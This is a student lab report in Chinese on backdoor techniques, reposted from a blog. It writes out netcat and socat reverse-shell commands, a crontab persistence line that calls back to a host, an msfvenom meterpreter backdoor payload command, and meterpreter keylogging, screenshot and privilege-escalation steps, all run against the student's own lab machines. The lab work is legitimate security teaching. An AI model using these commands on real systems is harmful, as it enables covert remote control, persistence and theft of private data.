20145206 邹京儒 《网络攻防》 后门原理与实践

20145206 邹京儒 《网络攻防》 后门原理与实践

一、实践过程记录

使用netcat获取主机操作Shell,cron启动

1、linux获取windows的shell:

从码云上下载ncat.rar(kali中已经自带):
877170-20170314212437901-1988523317.png
用ifconfig获取Kali的ip:
877170-20170314212813213-656627638.png
在kali下使用nc -l -p 5206来将5206设置成监听端口开始监听:
877170-20170314212919495-1914348835.png
windows下输入netcat.exe -e cmd 10.1.1.140 5206实现kali对windowsshell的控制:
877170-20170314213156213-1978227278.png

2、windows获取linux的shell:

利用ipconfig获取主机ip 10.1.1.162:
877170-20170314215531932-427248585.png

windows使用c:\你的nc的目录路径>ncat.exe -l -p 5206命令于5206端口进行监听。
877170-20170314215718120-1822557977.png

linux使用nc win的IP 5206 -e /bin/sh命令通过5206端口反弹连接windows主机
877170-20170314220005604-146068242.png

随后,我们在windows主机下就获得了linux的shell,可以运行linux下的指令并获取linux主机的信息,如ls指令:
877170-20170314215932745-1347682793.png

3、ncat传输文件:
由于我换了wifi,所以ip地址变了。。。
877170-20170315085844354-1672573336.png
如图所示,先在windows中打开监听,然后在linux系统中发送文件:
877170-20170315090739979-625433770.png
877170-20170315090807307-1945944546.png

传输的文件查看:
877170-20170315090607745-847148360.png
4、用crontab -e指令编辑一条定时任务,在最后一行添加02 * * * * /bin/netcat 172.20.10.3 5206 -e /bin/sh,意思是在每个小时的第02分钟反向连接Windows主机的5206端口
877170-20170316170653448-472268205.png
877170-20170316170726713-32797265.png
当时间到了02分时,此时已经获得了Kali的shell,可以输入指令
877170-20170316170832385-1343684788.png

使用socat获取主机操作Shell, 任务计划启动

1、以linux利用socat获取windows的shell为例
在Linux的终端上使用socat - tcp:win的IP:5206命令监听5206端口:
877170-20170315184039916-1858600243.png
win在命令行下使用socat tcp-listen:5206 exec:cmd,pty,stderr命令在5206端口反弹连接Linux
877170-20170315184157448-671483314.png
随即,Linux获得了win的shell:
877170-20170315184323682-354896762.png
2、任务计划启动
在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
877170-20170316154712245-174070864.png
在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5206 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5206,同时把cmd.exe的stderr重定向到stdout上:
877170-20170316155140776-2065864665.png

877170-20170315222441166-2127810269.png
877170-20170315222533401-511765659.png

使用MSF meterpreter生成可执行文件,利用ncat传送文件到主机并运行获取主机Shell

在Linux下使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=35206 -f exe >fool3.exe命令生成一个名为fool3.exe的后门程序:
877170-20170315191147073-421216501.png

877170-20170315191104057-1819027539.png

使用netcat将这个后门程序传送到Win主机:
在win的命令行下使用ncat.exe -lv 35206 > fool3.exe命令进行监听
877170-20170315192200385-477179906.png
随后在Linux下使用ncat -nv 172.30.6.174 35206 < fool3.exe命令把文件传送过去
877170-20170315192447088-1039581918.png
开启MSF监听进程
877170-20170315200356291-1226233265.png
877170-20170315200433854-633058430.png

877170-20170315200449276-213988589.png
双击运行win下的fool3.exe:
877170-20170315200539588-1206817725.png
877170-20170315200602620-1069769734.png

Linux就可以获得win的shell,进行远程控制了。

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

sysinfo查看系统版本信息:
877170-20170315201255495-62750463.png

screenshot直接对靶机屏幕截图:
877170-20170315201218495-1734190637.png

键盘记录内容:keyscan_start命令开始捕捉键盘记录;keyscan_dump命令停止键盘记录的捕捉并显示出来键盘的记录
877170-20170315202146807-30203164.png
在靶机安装一些系统服务
877170-20170315212836291-220359622.png
getsystem为提权命令,可以获取私人权限
877170-20170315212945385-774182088.png

二、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
可能操作系统自带后门,用户不知情,但开发方可以方便自己的权限。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
也许是在计算机上点击运行某个程序时,就会开启后门。
(3)Meterpreter有哪些给你映像深刻的功能?
可以捕获被攻击主机的屏幕和摄像头,在实验中实现了一下,觉得确实震撼到了我!
还有提权功能,看了其他同学的博客,好像win8不行,但我是win7~
(4)如何发现自己有系统有没有被安装后门?
有些拥有反向连接的后门可以用dos命令检测:这类后门一般会监听某个指定断口,要检查这类后门需要用到dos命令在没有打开任何网络连接页面和防火墙的情况下输入netstat -an 监听本地开放端口,看是否有本地ip连接外网ip。

三、实验总结与体会

通过本次实验,我了解了一些关于后门的相关知识,觉得其实后门挺可怕的,尤其是可以获取到被攻击主机的摄像头、屏幕、键盘时,可能某些个人隐私就会暴露!!!还有,本人使用的是win7,但听说使用win8,win10的朋友们在植入后门时都不同程度地受到了阻挠。。。然而win7好像并没有。。。我有点怀疑win7是不是有点弱smile~

转载于:https://www.cnblogs.com/ZouJR/p/6551048.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值